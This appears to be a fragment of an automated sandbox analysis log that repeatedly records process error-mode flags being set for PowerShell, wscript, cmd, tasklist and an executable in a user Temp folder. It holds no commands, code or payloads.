                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess information set: NOOPENFILEERRORBOX
